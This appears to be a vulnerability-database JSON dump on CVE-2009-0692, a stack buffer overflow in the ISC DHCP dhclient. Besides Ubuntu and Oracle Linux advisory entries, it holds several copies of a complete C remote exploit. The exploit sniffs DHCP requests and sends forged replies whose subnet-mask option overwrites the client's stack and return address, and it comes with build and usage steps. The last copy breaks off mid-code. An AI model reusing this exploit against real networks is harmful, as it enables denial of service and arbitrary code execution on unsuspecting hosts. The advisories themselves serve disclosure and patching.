\neth_h = (struct eth_hdr *) pkt; \nip_h = (struct ip_hdr *) ((char *) eth_h + ETH_HDR_LEN); \nudp_h = (struct udp_hdr *) ((char *) ip_h + IP_HDR_LEN); \ndhcp_h = (struct dhcp_hdr *) ((char *) udp_h + UDP_HDR_LEN); \ndhcp_opt = (struct dhcp_opt *) ((char *) dhcp_h + DHCP_HDR_LEN); \n \n/* only care about REQUEST opcodes */ \nif (dhcp_h->op != DHCP_OP_REQUEST) { \nreturn; \n} \n \n/* parse DHCP options */ \nwhile (1) { \nif (dhcp_opt->opt == DHCP_OPT_MSGTYPE) { \nif (dhcp_opt->len != 1) { \nreturn; \n} \nmemcpy(&msg_type, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt->len); \n} \nif (dhcp_opt->opt == DHCP_OPT_REQIP) { \nif (dhcp_opt->len != 4) { \nreturn; \n} \nmemcpy(&yiaddr, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt->len); \n} \nif (dhcp_opt->opt == DHCP_OPT_END) { \nbreak; \n} \nif (((char *) dhcp_opt - (char *) pkt) + DHCP_OPT_HDR_LEN + dhcp_opt->len > clen) { \nbreak; \n} \ndhcp_opt = (struct dhcp_opt *) ((char *) dhcp_opt + DHCP_OPT_HDR_LEN + dhcp_opt->len); \n} \n \n/* only care about REQUEST msg types */ \nif (msg_type != DHCP_TYPE_REQUEST) { \nreturn; \n} \n \nprintf(\"[+] snarfed DHCP request from %s with xid 0x%08x\\n\", eth_ntoa(ð_h->eth_src), dhcp_h->xid); \nprintf(\"[+] sending malicious DHCP response to %s with xid 0x%08x\\n\\n\", eth_ntoa(ð_h->eth_src), dhcp_h->xid); \n \n/* construct stack payload */ \nmemset(payload, 0, sizeof(payload)); \nptr = payload; \nmemset(ptr, 0, 16); \nptr += 16; \nmemcpy(ptr, READABLE_1, 4); \nptr += 4; \nmemcpy(ptr, READABLE_2, 4); \nptr += 4; \nmemset(ptr, 0, 8); \nptr += 8; \nmemcpy(ptr, \"\\x04\\x00\\x00\\x00\", 4); \nptr += 4; \nmemset(ptr, 0, 28); \nptr += 28; \nmemcpy(ptr, JMP_TARGET, 4); \nptr += 4; \npayload_len = ptr - payload; \n \n/* dhcp header */ \ndhcp_h->op = DHCP_OP_REPLY; \nmemcpy(&dhcp_h->yiaddr, &yiaddr, 4); \n \n/* normal dhcp options */ \nmemset(options, 0, sizeof(options)); \nptr = options; \nmemcpy(ptr, \"\\x35\\x01\\x05\", 3); \nptr += 3; \nmemcpy(ptr, \"\\x36\\x04\\x00\\x06\\x09\\x02\", 6); \nptr += 6; \nmemcpy(ptr, \"\\x33\\x04\\x00\\x09\\x3a\\x80\", 6); \nptr += 6; \nmemcpy(ptr, \"\\x03\\x04\\x00\\x06\\x09\\x02\", 6); \nptr += 6; \nmemcpy(ptr, \"\\x06\\x04\\x00\\x06\\x09\\x02\", 6); \nptr += 6; \n \n/* malicious subnet mask option */ \nmemcpy(ptr, \"\\x01\", 1); \nptr += 1; \nmemcpy(ptr, &payload_len, 1); \nptr += 1; \nmemcpy(ptr, payload, payload_len); \nptr += payload_len; \n \nmemcpy(ptr, \"\\xff\", 1); \nptr += 1; \nopt_len = ptr - options; \n \n/* construct full packet payload */ \nmemset(pktbuf, 0, sizeof(pktbuf)); \nptr = pktbuf; \n \neth_pack_hdr(ptr, ETH_ADDR_BROADCAST, \"\\xc1\\x1e\\x20\\x09\\x06\\x92\", ETH_TYPE_IP); \nptr += ETH_HDR_LEN; \n \nip_pack_hdr(ptr, 0, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len, 0x0692, IP_DF, 64, IP_PROTO_UDP, 34145792, IP_ADDR_BROADCAST); \nptr += IP_HDR_LEN; \n \nudp_pack_hdr(ptr, 67, 68, UDP_HDR_LEN + DHCP_HDR_LEN + opt_len); \nptr += UDP_HDR_LEN; \n \nmemcpy(ptr, dhcp_h, DHCP_HDR_LEN); \nptr += DHCP_HDR_LEN; \n \nmemcpy(ptr, options, opt_len); \nptr += opt_len; \n \nip_checksum(pktbuf + ETH_HDR_LEN, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len); \n \n/* fire off malicious response */ \nraw = eth_open(dev); \nif (!raw) { \nfprintf(stderr, \"[-] error opening raw socket on %s\\n\", dev); \nexit(1); \n} \neth_send(raw, pktbuf, ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len); \neth_close(raw); \n} \n \nvoid \nusage(char **argv) \n{ \nfprintf(stderr, \"usage: %s [-i interface]\\n\", argv[0]); \nexit(1); \n} \n \nint \nmain(int argc, char **argv) \n{ \nint ch, ret; \nchar *dev = NULL; \nchar errbuf[PCAP_ERRBUF_SIZE]; \nstruct bpf_program bfp; \npcap_t *ph; \n \nopterr = 0; \n \nwhile ((ch = getopt(argc, argv, \"i:\")) != -1) { \nswitch (ch) { \ncase 'i': \ndev = optarg; \nbreak; \ndefault: \nusage(argv); \n} \n} \n \nif (!dev) { \ndev = pcap_lookupdev(errbuf); \nif (!dev) { \nfprintf(stderr, \"[-] couldn't find default interface: %s\\n\", errbuf); \nexit(1); \n} \n} \n \nph = pcap_open_live(dev, PKT_BUFSIZ, 1, 1, errbuf); \nif (!ph) { \nfprintf(stderr, \"[-] couldn't open interface %s: %s\\n\", dev, errbuf); \nexit(1); \n} \n \nret = pcap_compile(ph, &bfp, BPF_FILTER, 1, 0); \nif (ret == -1) { \nfprintf(stderr, \"[-] couldn't parse BPF filter: %s\\n\", pcap_geterr(ph)); \nexit(1); \n} \n \npcap_setfilter(ph, &bfp); \nif (ret == -1) { \nfprintf(stderr, \"[-] couldn't set BPF filter: %s\\n\", pcap_geterr(ph)); \nexit(1); \n} \n \nprintf(\"[+] listening on %s: %s\\n\", dev, BPF_FILTER); \n \npcap_loop(ph, -1, process, dev); \n \nreturn 0; \n} \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/79651/iscdhcp-overflow.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:09:28", "bulletinFamily": "unix", "description": "It was discovered that the DHCP client as included in dhcp3 did not verify the length of certain option fields when processing a response from an IPv4 dhcp server. If a user running Ubuntu 6.06 LTS or 8.04 LTS connected to a malicious dhcp server, a remote attacker could cause a denial of service or execute arbitrary code as the user invoking the program, typically the \u2018dhcp\u2019 user. For users running Ubuntu 8.10 or 9.04, a remote attacker should only be able to cause a denial of service in the DHCP client. In Ubuntu 9.04, attackers would also be isolated by the AppArmor dhclient3 profile.", "modified": "2009-07-14T00:00:00", "published": "2009-07-14T00:00:00", "id": "USN-803-1", "href": "https://usn.ubuntu.com/803-1/", "title": "dhcp vulnerability", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:10:25", "bulletinFamily": "unix", "description": "USN-803-1 fixed a vulnerability in Dhcp. Due to an error, the patch to fix the vulnerability was not properly applied on Ubuntu 8.10 and higher. Even with the patch improperly applied, the default compiler options reduced the vulnerability to a denial of service. Additionally, in Ubuntu 9.04 and higher, users were also protected by the AppArmor dhclient3 profile. This update fixes the problem.\n\nOriginal advisory details:\n\nIt was discovered that the DHCP client as included in dhcp3 did not verify the length of certain option fields when processing a response from an IPv4 dhcp server. If a user running Ubuntu 6.06 LTS or 8.04 LTS connected to a malicious dhcp server, a remote attacker could cause a denial of service or execute arbitrary code as the user invoking the program, typically the \u2018dhcp\u2019 user. For users running Ubuntu 8.10 or 9.04, a remote attacker should only be able to cause a denial of service in the DHCP client. In Ubuntu 9.04, attackers would also be isolated by the AppArmor dhclient3 profile.", "modified": "2010-01-27T00:00:00", "published": "2010-01-27T00:00:00", "id": "USN-803-2", "href": "https://usn.ubuntu.com/803-2/", "title": "Dhcp vulnerability", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:49:01", "bulletinFamily": "unix", "description": "[3.0.1-65.1]\n- Correct package NVR\n Related: rhbz#507736\n[3.0.1-65.EL4.1]\n- Fix for CVE-2009-0692\n Resolves: rhbz#507736", "modified": "2009-07-14T00:00:00", "published": "2009-07-14T00:00:00", "id": "ELSA-2009-1136", "href": "http://linux.oracle.com/errata/ELSA-2009-1136.html", "title": "dhcp security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:39:28", "bulletinFamily": "unix", "description": "[7:3.0.1-10.2_EL3]\n- Make sure fix for #507734 is included\n Related: rhbz#507734\n[7:3.0.1-10.1_EL3]\n- Fix for CVE-2009-0692\n Resolves: rhbz#507734", "modified": "2009-07-14T00:00:00", "published": "2009-07-14T00:00:00", "id": "ELSA-2009-1154", "href": "http://linux.oracle.com/errata/ELSA-2009-1154.html", "title": "dhcp security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-01T10:13:15", "bulletinFamily": "exploit", "description": "ISC DHCP dhclient < 3.1.2p1 Remote Buffer Overflow PoC. CVE-2009-0692. Dos exploit for linux platform", "modified": "2009-07-27T00:00:00", "published": "2009-07-27T00:00:00", "id": "EDB-ID:9265", "href": "https://www.exploit-db.com/exploits/9265/", "type": "exploitdb", "title": "ISC DHCP dhclient < 3.1.2p1 - Remote Buffer Overflow PoC", "sourceData": "/*\n * cve-2009-0692.c\n *\n * ISC DHCP dhclient < 3.1.2p1 Remote Exploit\n * Jon Oberheide <jon@oberheide.org>\n * http://jon.oberheide.org\n * \n * Information:\n * \n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0692\n * \n * Stack-based buffer overflow in the script_write_params method in \n * client/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0 before \n * 4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP servers to \n * execute arbitrary code via a crafted subnet-mask option.\n * \n * Usage:\n *\n * $ gcc cve-2009-0692.c -o cve-2009-0692 -lpcap -ldnet\n * $ sudo ./cve-2009-0692\n * [+] listening on eth0: ip and udp and src port 68 and dst port 67\n * [+] snarfed DHCP request from 00:19:d1:90:e5:4a with xid 0x120f8920\n * [+] sending malicious DHCP response to 00:19:d1:90:e5:4a with xid 0x120f8920\n *\n * $ gdb /sbin/dhclient\n * ...\n * DHCPREQUEST on eth0 to 255.255.255.255 port 67\n * DHCPACK from 0.6.9.2\n * ...\n * Program received signal SIGSEGV, Segmentation fault.\n * 0x41414141 in ?? ()\n * \n * Notes:\n * \n * Only tested with dhclient 3.1.2 on 32-bit Gentoo / GCC 4.3.3. Feel free\n * to tweak for your target platform. Depends on libdnet and libpcap.\n *\n * READABLE_1 and READABLE_2 need to be readable addresses as we fix up the \n * stack during our overflow. After a successful return from the vulnerable\n * script_write_params function, EIP will be set to JMP_TARGET.\n *\n * Exclusively for use at DEFCON next week. ;-) \n */\n\n#include <ctype.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <stdint.h>\n#include <string.h>\n#include <unistd.h>\n#include <dnet.h>\n#include <pcap.h>\n\n#define READABLE_1 \"\\xa8\\xfc\\x0b\\x08\" /* for es.client */\n#define READABLE_2 \"\\xbc\\x34\\x0a\\x08\" /* for es.prefix */\n#define JMP_TARGET \"\\x41\\x41\\x41\\x41\"\n\n#define BPF_FILTER \"ip and udp and src port 68 and dst port 67\"\n#define PKT_BUFSIZ 1514\n#define DHCP_OP_REQUEST 1\n#define DHCP_OP_REPLY 2\n#define DHCP_TYPE_REQUEST 3\n#define DHCP_TYPE_ACK 5\n#define DHCP_OPT_REQIP 50\n#define DHCP_OPT_MSGTYPE 53\n#define DHCP_OPT_END 255\n#define DHCP_CHADDR_LEN 16\n#define SERVERNAME_LEN 64\n#define BOOTFILE_LEN 128\n#define DHCP_HDR_LEN 240\n#define DHCP_OPT_HDR_LEN 2\n\n#ifndef __GNUC__\n# define __attribute__(x)\n# pragma pack(1)\n#endif\n\nstruct dhcp_hdr {\n\tuint8_t op;\n\tuint8_t hwtype;\n\tuint8_t hwlen;\n\tuint8_t hwopcount;\n\tuint32_t xid;\n\tuint16_t secs;\n\tuint16_t flags;\n\tuint32_t ciaddr;\n\tuint32_t yiaddr;\n\tuint32_t siaddr;\n\tuint32_t giaddr;\n\tuint8_t chaddr[DHCP_CHADDR_LEN];\n\tuint8_t servername[SERVERNAME_LEN];\n\tuint8_t bootfile[BOOTFILE_LEN];\n\tuint32_t cookie;\n} __attribute__((__packed__));\n\nstruct dhcp_opt {\n\tuint8_t opt;\n\tuint8_t len;\n} __attribute__((__packed__));\n\n#ifndef __GNUC__\n# pragma pack()\n#endif\n\nvoid\nprocess(u_char *data, const struct pcap_pkthdr *pkthdr, const u_char *pkt)\n{\n\teth_t *raw;\n\tstruct ip_hdr *ip_h;\n\tstruct eth_hdr *eth_h;\n\tstruct udp_hdr *udp_h;\n\tstruct dhcp_hdr *dhcp_h;\n\tstruct dhcp_opt *dhcp_opt;\n\tchar *dev = data, *ptr;\n\tchar pktbuf[PKT_BUFSIZ], options[PKT_BUFSIZ], payload[PKT_BUFSIZ];\n\tint opt_len, clen = pkthdr->caplen;\n\tuint8_t msg_type = 0, payload_len = 0;\n\tuint32_t yiaddr = 0;\n\n\t/* packet too short */\n\tif (clen < ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + DHCP_OPT_HDR_LEN) {\n\t\treturn;\n\t}\n\n\teth_h = (struct eth_hdr *) pkt;\n\tip_h = (struct ip_hdr *) ((char *) eth_h + ETH_HDR_LEN);\n\tudp_h = (struct udp_hdr *) ((char *) ip_h + IP_HDR_LEN);\n\tdhcp_h = (struct dhcp_hdr *) ((char *) udp_h + UDP_HDR_LEN);\n\tdhcp_opt = (struct dhcp_opt *) ((char *) dhcp_h + DHCP_HDR_LEN);\n\n\t/* only care about REQUEST opcodes */\n\tif (dhcp_h->op != DHCP_OP_REQUEST) {\n\t\treturn;\n\t}\n\n\t/* parse DHCP options */\n\twhile (1) {\n\t\tif (dhcp_opt->opt == DHCP_OPT_MSGTYPE) {\n\t\t\tif (dhcp_opt->len != 1) {\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tmemcpy(&msg_type, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt->len);\n\t\t}\n\t\tif (dhcp_opt->opt == DHCP_OPT_REQIP) {\n\t\t\tif (dhcp_opt->len != 4) {\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tmemcpy(&yiaddr, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt->len);\n\t\t}\n\t\tif (dhcp_opt->opt == DHCP_OPT_END) {\n\t\t\tbreak;\n\t\t}\n\t\tif (((char *) dhcp_opt - (char *) pkt) + DHCP_OPT_HDR_LEN + dhcp_opt->len > clen) {\n\t\t\tbreak;\n\t\t}\n\t\tdhcp_opt = (struct dhcp_opt *) ((char *) dhcp_opt + DHCP_OPT_HDR_LEN + dhcp_opt->len);\n\t}\n\n\t/* only care about REQUEST msg types */\n\tif (msg_type != DHCP_TYPE_REQUEST) {\n\t\treturn;\n\t}\n\n\tprintf(\"[+] snarfed DHCP request from %s with xid 0x%08x\\n\", eth_ntoa(ð_h->eth_src), dhcp_h->xid);\n\tprintf(\"[+] sending malicious DHCP response to %s with xid 0x%08x\\n\\n\", eth_ntoa(ð_h->eth_src), dhcp_h->xid);\n\n\t/* construct stack payload */\n\tmemset(payload, 0, sizeof(payload));\n\tptr = payload;\n\tmemset(ptr, 0, 16);\n\tptr += 16;\n\tmemcpy(ptr, READABLE_1, 4);\n\tptr += 4;\n\tmemcpy(ptr, READABLE_2, 4);\n\tptr += 4;\n\tmemset(ptr, 0, 8);\n\tptr += 8;\n\tmemcpy(ptr, \"\\x04\\x00\\x00\\x00\", 4);\n\tptr += 4;\n\tmemset(ptr, 0, 28);\n\tptr += 28;\n\tmemcpy(ptr, JMP_TARGET, 4);\n\tptr += 4;\n\tpayload_len = ptr - payload;\n\n\t/* dhcp header */\n\tdhcp_h->op = DHCP_OP_REPLY;\n\tmemcpy(&dhcp_h->yiaddr, &yiaddr, 4);\n\n\t/* normal dhcp options */\n\tmemset(options, 0, sizeof(options));\n\tptr = options;\n\tmemcpy(ptr, \"\\x35\\x01\\x05\", 3);\n\tptr += 3;\n\tmemcpy(ptr, \"\\x36\\x04\\x00\\x06\\x09\\x02\", 6);\n\tptr += 6;\n\tmemcpy(ptr, \"\\x33\\x04\\x00\\x09\\x3a\\x80\", 6);\n\tptr += 6;\n\tmemcpy(ptr, \"\\x03\\x04\\x00\\x06\\x09\\x02\", 6);\n\tptr += 6;\n\tmemcpy(ptr, \"\\x06\\x04\\x00\\x06\\x09\\x02\", 6);\n\tptr += 6;\n\n\t/* malicious subnet mask option */\n\tmemcpy(ptr, \"\\x01\", 1);\n\tptr += 1;\n\tmemcpy(ptr, &payload_len, 1);\n\tptr += 1;\n\tmemcpy(ptr, payload, payload_len);\n\tptr += payload_len;\n\n\tmemcpy(ptr, \"\\xff\", 1);\n\tptr += 1;\n\topt_len = ptr - options;\n\n\t/* construct full packet payload */\n\tmemset(pktbuf, 0, sizeof(pktbuf));\n\tptr = pktbuf;\n\n\teth_pack_hdr(ptr, ETH_ADDR_BROADCAST, \"\\xc1\\x1e\\x20\\x09\\x06\\x92\", ETH_TYPE_IP);\n\tptr += ETH_HDR_LEN;\n\n\tip_pack_hdr(ptr, 0, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len, 0x0692, IP_DF, 64, IP_PROTO_UDP, 34145792, IP_ADDR_BROADCAST);\n\tptr += IP_HDR_LEN;\n\n\tudp_pack_hdr(ptr, 67, 68, UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);\n\tptr += UDP_HDR_LEN;\n\n\tmemcpy(ptr, dhcp_h, DHCP_HDR_LEN);\n\tptr += DHCP_HDR_LEN;\n\n\tmemcpy(ptr, options, opt_len);\n\tptr += opt_len;\n\n\tip_checksum(pktbuf + ETH_HDR_LEN, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);\n\n\t/* fire off malicious response */\n\traw = eth_open(dev);\n\tif (!raw) {\n\t\tfprintf(stderr, \"[-] error opening raw socket on %s\\n\", dev);\n\t\texit(1);\n\t}\n\teth_send(raw, pktbuf, ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);\n\teth_close(raw);\n}\n\nvoid\nusage(char **argv)\n{\n\tfprintf(stderr, \"usage: %s [-i interface]\\n\", argv[0]);\n\texit(1);\n}\n\nint\nmain(int argc, char **argv)\n{\n\tint ch, ret;\n\tchar *dev = NULL;\n\tchar errbuf[PCAP_ERRBUF_SIZE];\n\tstruct bpf_program bfp;\n\tpcap_t *ph;\n\t\n\topterr = 0;\n\n\twhile ((ch = getopt(argc, argv, \"i:\")) != -1) {\n\t\tswitch (ch) {\n\t\tcase 'i':\n\t\t\tdev = optarg;\n\t\t\tbreak;\n\t\tdefault:\n\t\t\tusage(argv);\n\t\t}\n\t}\n\n\tif (!dev) {\n\t\tdev = pcap_lookupdev(errbuf);\n\t\tif (!dev) {\n\t\t\tfprintf(stderr, \"[-] couldn't find default interface: %s\\n\", errbuf);\n\t\t\texit(1);\n\t\t}\n\t}\n\n\tph = pcap_open_live(dev, PKT_BUFSIZ, 1, 1, errbuf);\n\tif (!ph) {\n\t\tfprintf(stderr, \"[-] couldn't open interface %s: %s\\n\", dev, errbuf);\n\t\texit(1);\n\t}\n\n\tret = pcap_compile(ph, &bfp, BPF_FILTER, 1, 0);\n\tif (ret == -1) {\n\t\tfprintf(stderr, \"[-] couldn't parse BPF filter: %s\\n\", pcap_geterr(ph));\n\t\texit(1);\n\t}\n\n\tpcap_setfilter(ph, &bfp);\n\tif (ret == -1) {\n\t\tfprintf(stderr, \"[-] couldn't set BPF filter: %s\\n\", pcap_geterr(ph));\n\t\texit(1);\n\t}\n\n\tprintf(\"[+] listening on %s: %s\\n\", dev, BPF_FILTER);\n\n\tpcap_loop(ph, -1, process, dev);\n\n\treturn 0;\n}\n\n// milw0rm.com [2009-07-27]\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/9265/"}, {"lastseen": "2016-02-01T11:44:07", "bulletinFamily": "exploit", "description": "ISC DHCP 'dhclient' 'script_write_params()' - Stack Buffer Overflow Vulnerability. CVE-2009-0692. Remote exploits for multiple platform", "modified": "2009-11-10T00:00:00", "published": "2009-11-10T00:00:00", "id": "EDB-ID:10015", "href": "https://www.exploit-db.com/exploits/10015/", "type": "exploitdb", "title": "ISC DHCP 'dhclient' 'script_write_params' - Stack Buffer Overflow Vulnerability", "sourceData": "/*\r\n * cve-2009-0692.c\r\n *\r\n * ISC DHCP dhclient < 3.1.2p1 Remote Exploit\r\n * Jon Oberheide <jon@oberheide.org>\r\n * http://jon.oberheide.org\r\n * \r\n * Information:\r\n * \r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0692\r\n * \r\n * Stack-based buffer overflow in the script_write_params method in \r\n * client/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0 before \r\n * 4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP servers to \r\n * execute arbitrary code via a crafted subnet-mask option.\r\n * \r\n * Usage:\r\n *\r\n * $ gcc cve-2009-0692.c -o cve-2009-0692 -lpcap -ldnet\r\n * $ sudo ./cve-2009-0692\r\n * [+] listening on eth0: ip and udp and src port 68 and dst port 67\r\n * [+] snarfed DHCP request from 00:19:d1:90:e5:4a with xid 0x120f8920\r\n * [+] sending malicious DHCP response to 00:19:d1:90:e5:4a with xid 0x120f8920\r\n *\r\n * $ gdb /sbin/dhclient\r\n * ...\r\n * DHCPREQUEST on eth0 to 255.255.255.255 port 67\r\n * DHCPACK from 0.6.9.2\r\n * ...\r\n * Program received signal SIGSEGV, Segmentation fault.\r\n * 0x41414141 in ?? ()\r\n * \r\n * Notes:\r\n * \r\n * Only tested with dhclient 3.1.2 on 32-bit Gentoo / GCC 4.3.3. Feel free\r\n * to tweak for your target platform. Depends on libdnet and libpcap.\r\n *\r\n * READABLE_1 and READABLE_2 need to be readable addresses as we fix up the \r\n * stack during our overflow. After a successful return from the vulnerable\r\n * script_write_params function, EIP will be set to JMP_TARGET.\r\n *\r\n * Exclusively for use at DEFCON next week. ;-) \r\n */\r\n\r\n#include <ctype.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <stdint.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <dnet.h>\r\n#include <pcap.h>\r\n\r\n#define READABLE_1 \"\\xa8\\xfc\\x0b\\x08\" /* for es.client */\r\n#define READABLE_2 \"\\xbc\\x34\\x0a\\x08\" /* for es.prefix */\r\n#define JMP_TARGET \"\\x41\\x41\\x41\\x41\"\r\n\r\n#define BPF_FILTER \"ip and udp and src port 68 and dst port 67\"\r\n#define PKT_BUFSIZ 1514\r\n#define DHCP_OP_REQUEST 1\r\n#define DHCP_OP_REPLY 2\r\n#define DHCP_TYPE_REQUEST 3\r\n#define DHCP_TYPE_ACK 5\r\n#define DHCP_OPT_REQIP 50\r\n#define DHCP_OPT_MSGTYPE 53\r\n#define DHCP_OPT_END 255\r\n#define DHCP_CHADDR_LEN 16\r\n#define SERVERNAME_LEN 64\r\n#define BOOTFILE_LEN 128\r\n#define DHCP_HDR_LEN 240\r\n#define DHCP_OPT_HDR_LEN 2\r\n\r\n#ifndef __GNUC__\r\n# define __attribute__(x)\r\n# pragma pack(1)\r\n#endif\r\n\r\nstruct dhcp_hdr {\r\n\tuint8_t op;\r\n\tuint8_t hwtype;\r\n\tuint8_t hwlen;\r\n\tuint8_t hwopcount;\r\n\tuint32_t xid;\r\n\tuint16_t secs;\r\n\tuint16_t flags;\r\n\tuint32_t ciaddr;\r\n\tuint32_t yiaddr;\r\n\tuint32_t siaddr;\r\n\tuint32_t giaddr;\r\n\tuint8_t chaddr[DHCP_CHADDR_LEN];\r\n\tuint8_t servername[SERVERNAME_LEN];\r\n\tuint8_t bootfile[BOOTFILE_LEN];\r\n\tuint32_t cookie;\r\n} __attribute__((__packed__));\r\n\r\nstruct dhcp_opt {\r\n\tuint8_t opt;\r\n\tuint8_t len;\r\n} __attribute__((__packed__));\r\n\r\n#ifndef __GNUC__\r\n# pragma pack()\r\n#endif\r\n\r\nvoid\r\nprocess(u_char *data, const struct pcap_pkthdr *pkthdr, const u_char *pkt)\r\n{\r\n\teth_t *raw;\r\n\tstruct ip_hdr *ip_h;\r\n\tstruct eth_hdr *eth_h;\r\n\tstruct udp_hdr *udp_h;\r\n\tstruct dhcp_hdr *dhcp_h;\r\n\tstruct dhcp_opt *dhcp_opt;\r\n\tchar *dev = data, *ptr;\r\n\tchar pktbuf[PKT_BUFSIZ], options[PKT_BUFSIZ], payload[PKT_BUFSIZ];\r\n\tint opt_len, clen = pkthdr->caplen;\r\n\tuint8_t msg_type = 0, payload_len = 0;\r\n\tuint32_t yiaddr = 0;\r\n\r\n\t/* packet too short */\r\n\tif (clen < ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + DHCP_OPT_HDR_LEN) {\r\n\t\treturn;\r\n\t}\r\n\r\n\teth_h = (struct eth_hdr *) pkt;\r\n\tip_h = (struct ip_hdr *) ((char *) eth_h + ETH_HDR_LEN);\r\n\tudp_h = (struct udp_hdr *) ((char *) ip_h + IP_HDR_LEN);\r\n\tdhcp_h = (struct dhcp_hdr *) ((char *) udp_h + UDP_HDR_LEN);\r\n\tdhcp_opt = (struct dhcp_opt *) ((char *) dhcp_h + DHCP_HDR_LEN);\r\n\r\n\t/* only care about REQUEST opcodes */\r\n\tif (dhcp_h->op != DHCP_OP_REQUEST) {\r\n\t\treturn;\r\n\t}\r\n\r\n\t/* parse DHCP options */\r\n\twhile (1) {\r\n\t\tif (dhcp_opt->opt == DHCP_OPT_MSGTYPE) {\r\n\t\t\tif (dhcp_opt->len != 1) {\r\n\t\t\t\treturn;\r\n\t\t\t}\r\n\t\t\tmemcpy(&msg_type, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt->len);\r\n\t\t}\r\n\t\tif (dhcp_opt->opt == DHCP_OPT_REQIP) {\r\n\t\t\tif (dhcp_opt->len != 4) {\r\n\t\t\t\treturn;\r\n\t\t\t}\r\n\t\t\tmemcpy(&yiaddr, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt->len);\r\n\t\t}\r\n\t\tif (dhcp_opt->opt == DHCP_OPT_END) {\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tif (((char *) dhcp_opt - (char *) pkt) + DHCP_OPT_HDR_LEN + dhcp_opt->len > clen) {\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tdhcp_opt = (struct dhcp_opt *) ((char *) dhcp_opt + DHCP_OPT_HDR_LEN + dhcp_opt->len);\r\n\t}\r\n\r\n\t/* only care about REQUEST msg types */\r\n\tif (msg_type != DHCP_TYPE_REQUEST) {\r\n\t\treturn;\r\n\t}\r\n\r\n\tprintf(\"[+] snarfed DHCP request from %s with xid 0x%08x\\n\", eth_ntoa(ð_h->eth_src), dhcp_h->xid);\r\n\tprintf(\"[+] sending malicious DHCP response to %s with xid 0x%08x\\n\\n\", eth_ntoa(ð_h->eth_src), dhcp_h->xid);\r\n\r\n\t/* construct stack payload */\r\n\tmemset(payload, 0, sizeof(payload));\r\n\tptr = payload;\r\n\tmemset(ptr, 0, 16);\r\n\tptr += 16;\r\n\tmemcpy(ptr, READABLE_1, 4);\r\n\tptr += 4;\r\n\tmemcpy(ptr, READABLE_2, 4);\r\n\tptr += 4;\r\n\tmemset(ptr, 0, 8);\r\n\tptr += 8;\r\n\tmemcpy(ptr, \"\\x04\\x00\\x00\\x00\", 4);\r\n\tptr += 4;\r\n\tmemset(ptr, 0, 28);\r\n\tptr += 28;\r\n\tmemcpy(ptr, JMP_TARGET, 4);\r\n\tptr += 4;\r\n\tpayload_len = ptr - payload;\r\n\r\n\t/* dhcp header */\r\n\tdhcp_h->op = DHCP_OP_REPLY;\r\n\tmemcpy(&dhcp_h->yiaddr, &yiaddr, 4);\r\n\r\n\t/* normal dhcp options */\r\n\tmemset(options, 0, sizeof(options));\r\n\tptr = options;\r\n\tmemcpy(ptr, \"\\x35\\x01\\x05\", 3);\r\n\tptr += 3;\r\n\tmemcpy(ptr, \"\\x36\\x04\\x00\\x06\\x09\\x02\", 6);\r\n\tptr += 6;\r\n\tmemcpy(ptr, \"\\x33\\x04\\x00\\x09\\x3a\\x80\", 6);\r\n\tptr += 6;\r\n\tmemcpy(ptr, \"\\x03\\x04\\x00\\x06\\x09\\x02\", 6);\r\n\tptr += 6;\r\n\tmemcpy(ptr, \"\\x06\\x04\\x00\\x06\\x09\\x02\", 6);\r\n\tptr += 6;\r\n\r\n\t/* malicious subnet mask option */\r\n\tmemcpy(ptr, \"\\x01\", 1);\r\n\tptr += 